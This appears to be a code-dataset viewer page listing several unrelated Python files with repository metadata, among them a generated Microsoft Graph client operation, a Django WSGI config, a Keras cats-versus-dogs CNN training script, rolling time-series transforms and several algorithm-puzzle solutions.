PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-ltf2_ros".split(';') if "-ltf2_ros" != "" else []
PROJECT_NAME = "tf2_ros"
PROJECT_SPACE_DIR = "/home/morin-sol/ME652/devel"
PROJECT_VERSION = "0.6.7"
| [
"dream4future@kaist.ac.kr"
] | dream4future@kaist.ac.kr |
0e163fba7e7b98551f709ab3c3c7d44014488322 | 26d6c34df00a229dc85ad7326de6cb5672be7acc | /msgraph-cli-extensions/beta/usersactions_beta/azext_usersactions_beta/vendored_sdks/usersactions/operations/_users_outlook_task_groups_task_folders_tasks_operations.py | 3fd9123f0a63d2df59395ed32b06612e15190636 | [
"MIT"
] | permissive | BrianTJackett/msgraph-cli | 87f92471f68f85e44872939d876b9ff5f0ae6b2c | 78a4b1c73a23b85c070fed2fbca93758733f620e | refs/heads/main | 2023-06-23T21:31:53.306655 | 2021-07-09T07:58:56 | 2021-07-09T07:58:56 | 386,993,555 | 0 | 0 | NOASSERTION | 2021-07-17T16:56:05 | 2021-07-17T16:56:05 | null | UTF-8 | Python | false | false | 5,104 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class UsersOutlookTaskGroupsTaskFoldersTasksOperations(object):
"""UsersOutlookTaskGroupsTaskFoldersTasksOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~users_actions.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def complete(
self,
user_id, # type: str
outlook_task_group_id, # type: str
outlook_task_folder_id, # type: str
outlook_task_id, # type: str
**kwargs # type: Any
):
# type: (...) -> List["models.MicrosoftGraphOutlookTask"]
"""Invoke action complete.
Invoke action complete.
:param user_id: key: id of user.
:type user_id: str
:param outlook_task_group_id: key: id of outlookTaskGroup.
:type outlook_task_group_id: str
:param outlook_task_folder_id: key: id of outlookTaskFolder.
:type outlook_task_folder_id: str
:param outlook_task_id: key: id of outlookTask.
:type outlook_task_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of MicrosoftGraphOutlookTask, or the result of cls(response)
:rtype: list[~users_actions.models.MicrosoftGraphOutlookTask]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["models.MicrosoftGraphOutlookTask"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.complete.metadata['url'] # type: ignore
path_format_arguments = {
'user-id': self._serialize.url("user_id", user_id, 'str'),
'outlookTaskGroup-id': self._serialize.url("outlook_task_group_id", outlook_task_group_id, 'str'),
'outlookTaskFolder-id': self._serialize.url("outlook_task_folder_id", outlook_task_folder_id, 'str'),
'outlookTask-id': self._serialize.url("outlook_task_id", outlook_task_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[MicrosoftGraphOutlookTask]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
complete.metadata = {'url': '/users/{user-id}/outlook/taskGroups/{outlookTaskGroup-id}/taskFolders/{outlookTaskFolder-id}/tasks/{outlookTask-id}/microsoft.graph.complete'} # type: ignore
| [
"japhethobalak@gmail.com"
] | japhethobalak@gmail.com |
82955319c63241b4f150c0b4add43218c218c9b3 | 97dfda123c402f814986784dc2bf25d78431bece | /bizaarproject/wsgi.py | f19099b762b73612c3682fc2488f554d1297937f | [] | no_license | danmcc3557/CA1 | 729ecfd6163520ff642a58e8ef3abc41571ea71c | 343acc5d1aa5ca5ffc43db2ab832475664ecfc48 | refs/heads/master | 2023-09-05T09:36:29.972906 | 2021-11-16T15:57:33 | 2021-11-16T15:57:33 | 426,693,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for bizaarproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bizaarproject.settings')
application = get_wsgi_application()
| [
"="
] | = |
bd718c714e5759b6c8cb8d801d9ce9a6f8eb29ce | a1716a6ef649a843260fbfa4a66ccd8a6439094c | /Keras_L2_CNN/Week1_CNNclassification.py | 9484010243270d43cec294cc819919b4669e3534 | [] | no_license | pondjames007/TensorflowPractice | e28a8933303210c81c1c03edafe5036bff12f1b4 | e67df557cf383d74c7ec8a8cd009411b7cc5fd91 | refs/heads/master | 2020-07-12T10:59:01.284550 | 2020-01-15T20:41:56 | 2020-01-15T20:41:56 | 204,799,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,878 | py | """
Use CNN to do Classification
"""
import subprocess
subprocess.check_output(['wget', '--no-check-certificate',
'https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip',
'-O', './cats_and_dogs_filtered.zip'])
import os
import zipfile
import tensorflow as tf
from tensorflow._api.v1.keras.optimizers import RMSprop
from tensorflow._api.v1.keras.preprocessing.image import ImageDataGenerator
# The same as usual
local_zip = './cats_and_dogs_filtered.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('./')
zip_ref.close()
base_dir = './cats_and_dogs_filtered'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
# Directory with our training cat pictures
train_cats_dir = os.path.join(train_dir, 'cats')
# Directory with our training dog pictures
train_dogs_dir = os.path.join(train_dir, 'dogs')
# Directory with our validation cat pictures
validation_cats_dir = os.path.join(validation_dir, 'cats')
# Directory with our validation dog pictures
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(32, (3,3), activation='relu', input_shape=(150, 150, 3)),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(128, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(128, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(512, activation='relu'),
tf.keras.layers.Dense(1, activation='sigmoid')
])
model.compile(loss='binary_crossentropy',
optimizer=RMSprop(lr=1e-4),
metrics=['acc'])
##########################################
# Data Preprocessing
train_datagen = ImageDataGenerator(rescale = 1/255)
test_datagen = ImageDataGenerator(rescale= 1/255)
# Flow training images in batches of 20 using train_datagen generator
train_generator = train_datagen.flow_from_directory(
train_dir, # This is the source directory for training images
target_size= (150,150), # All images will be resized to 150x150
batch_size= 20,
class_mode= 'binary' # Since we use binary_crossentropy loss, we need binary labels
)
# Flow validation images in batches of 20 using test_datagen generator
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size= (150,150),
batch_size= 20,
class_mode= 'binary'
)
history = model.fit_generator(
train_generator,
steps_per_epoch= 100, # 2000 images = batch_size * steps
epochs= 100,
validation_data= validation_generator,
validation_steps= 50, # 1000 images = batch_size * steps
verbose= 2
)
| [
"jameshuang@nyu.edu"
] | jameshuang@nyu.edu |
11dc59a1ed4fe55de8ea9b04875b8c923a194556 | 04a540847c1333c987a1957fd8d31197c594f6bb | /leetcode/617. Merge Two Binary Trees_1.py | 7f7c1b449e5502e4774a62f6c638faff9feb4958 | [] | no_license | k8440009/Algorithm | fd148269b264b580876c7426e19dbe2425ddc1ab | a48eba0ac5c9f2e10f3c509ce9d349c8a1dc3f0c | refs/heads/master | 2023-04-02T16:06:10.260768 | 2023-04-02T11:04:32 | 2023-04-02T11:04:32 | 200,506,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | """
두 이진 트리 병합
- 재귀 탐색
"""
from typing import Optional
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def mergeTrees(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> Optional[TreeNode]:
if root1 and root2:
node = TreeNode(root1.val + root2.val)
node.left = self.mergeTrees(root1.left, root2.left)
node.right = self.mergeTrees(root1.right, root2.right)
return node
else:
return root1 or root2
| [
"k8440009@gmail.com"
] | k8440009@gmail.com |
ca14c4c9f925a129d4c8ddd3de75b5fb3e4c8267 | 3b1dc61a5d5f35e3e1ea612e21b160ce737dc85a | /dataprocess/transforms_v2.py | 22517d391bd2c6e4e88bc2f68cbf5b4fd43c1e43 | [] | no_license | ainklain/a_alloc | 2757c71347937c8ca62819bffca3a06506684851 | f9275d1bdf2a549e1d7fc4190e7fcfbe4526914a | refs/heads/master | 2023-05-09T14:16:29.509485 | 2021-06-01T06:11:06 | 2021-06-01T06:11:06 | 263,553,676 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,630 | py |
from abc import ABCMeta, abstractmethod
from functools import partial
import pandas as pd
import numpy as np
class BaseTransform:
@abstractmethod
def forward(self, x):
"""
x : [n_timesteps, n_features]
"""
pass
def __call__(self, x):
return self.forward(x)
class ToNumpy(BaseTransform):
def forward(self, x):
return np.array(x)
class RandomLike(BaseTransform):
def forward(self, x):
return np.random.randn(*x.shape)
class ToDataFrame(BaseTransform):
def __init__(self, idx, columns):
self.idx = idx
self.columns = columns
def forward(self, x):
return pd.DataFrame(x, index=self.idx, columns=self.columns)
class Rolling(BaseTransform):
def __init__(self, window):
self.window = window
def rolling(self, func, x):
n_timesteps, n_features = x.shape
y = np.zeros_like(x)
for i in range(n_timesteps):
y[i, :] = func(x[max(0, i-self.window):(i+1)])
return y
class RollingMean(Rolling):
def __init__(self, window=500):
super(RollingMean, self).__init__(window)
def forward(self, x):
return self.rolling(partial(np.nanmean, axis=0), x)
class RollingStd(Rolling):
def __init__(self, window=500):
super(RollingStd, self).__init__(window)
def forward(self, x):
return self.rolling(partial(np.nanstd, ddof=1, axis=0), x)
class RollingMeanReturn(Rolling):
def __init__(self, window=500):
super(RollingMeanReturn, self).__init__(window)
def forward(self, x):
return RollingMean(self.window)(RollingReturn(1)(x))
class RollingStdReturn(Rolling):
def __init__(self, window=500):
super(RollingStdReturn, self).__init__(window)
def forward(self, x):
return RollingStd(self.window)(RollingReturn(1)(x))
class RollingSharpe(Rolling):
def __init__(self, window=500):
super(RollingSharpe, self).__init__(window)
def forward(self, x):
func = lambda x: np.nanmean(x, axis=0) / np.nanstd(x, ddof=1, axis=0)
return self.rolling(func, x)
class RollingNormalize(Rolling):
def __init__(self, window=500):
super(RollingNormalize, self).__init__(window)
def forward(self, x):
func = lambda x: ((x - np.nanmean(x, axis=0)) / (np.nanstd(x, ddof=1, axis=0) + 1e-6))[-1, :]
return self.rolling(func, x)
class RollingReturn(Rolling):
def __init__(self, window=20):
super(RollingReturn, self).__init__(window)
def forward(self, x):
func = lambda x: x[-1, :] / x[0, :] - 1.
return self.rolling(func, x)
class RollingLogReturn(Rolling):
def __init__(self, window=20):
super(RollingLogReturn, self).__init__(window)
def forward(self, x):
func = lambda x: np.log(x[-1, :] / x[0, :])
return self.rolling(func, x)
class Transforms:
def __init__(self, transforms_list=[]):
self.transforms_list = transforms_list
def sequential(self, x):
for transforms_func, suffix in self.transforms_list:
x = transforms_func(x)
return x
def apply(self, x, columns, reduce='none'):
assert reduce in ['none', 'concat']
y = []
new_columns = []
for transforms_func, suffix in self.transforms_list:
y.append(transforms_func(x))
new_columns.append(["{}_{}".format(c, suffix) for c in columns])
if reduce == 'concat':
y = np.concatenate(y, axis=-1)
new_columns = sum(new_columns, [])
return y, new_columns
| [
"ainklain@gmail.com"
] | ainklain@gmail.com |
01bf709b05693158964bc867aa127048a38a2d94 | caa16eb083841e91a70603653928564f9fd3fed2 | /Python/permutations.py | f224894c8305bff31d52e3959b9957db1d273725 | [] | no_license | guker/letcode | ea5198a3678c5f6ab2aebd61dc882153a4af1199 | a8c93ead3db7fe86c66b4aee9a8c67cc71cf95ec | refs/heads/master | 2021-01-24T04:08:33.839243 | 2015-08-11T11:19:24 | 2015-08-11T11:19:24 | 40,593,439 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 926 | py | # Time: O(n!)
# Space: O(n)
#
# Given a collection of numbers, return all possible permutations.
#
# For example,
# [1,2,3] have the following permutations:
# [1,2,3], [1,3,2], [2,1,3], [2,3,1], [3,1,2], and [3,2,1].
#
class Solution:
# @param num, a list of integer
# @return a list of lists of integers
def permute(self, num):
result = []
used = [False] * len(num)
self.permuteRecu(result, used, [], num)
return result
def permuteRecu(self, result, used, cur, num):
if len(cur) == len(num):
result.append(cur + [])
return
for i in xrange(len(num)):
if not used[i]:
used[i] = True
cur.append(num[i])
self.permuteRecu(result, used, cur, num)
cur.pop()
used[i] = False
if __name__ == "__main__":
print Solution().permute([1, 2, 3])
| [
"kamyu104@gmail.com"
] | kamyu104@gmail.com |
ed287ca023d35de1bf3c0f11d9c35b191d78a610 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03148/s414464368.py | d15bae3c7da7d8ff9d5dcb931e8bf5def1b30313 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 762 | py |
n, k = list(map(int, input().split()))
sushi = []
for i in range(n):
sushi.append(list(map(int, input().split())))
point = 0
sushi_kind = set()
duplication = []
sushi.sort(key=lambda x: x[1],reverse = True)
for i in range(k):
point += sushi[i][1]
if sushi[i][0] in sushi_kind:
duplication.append(sushi[i])
else:
sushi_kind.add(sushi[i][0])
ans = point + pow(len(sushi_kind),2)
dup_index = len(duplication) - 1
for i in range(k,n):
if sushi[i][0] in sushi_kind:
continue
else:
if dup_index >= 0:
point -= duplication[dup_index][1]
dup_index -= 1
point += sushi[i][1]
sushi_kind.add(sushi[i][0])
ans = max(ans, point + pow(len(sushi_kind),2))
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.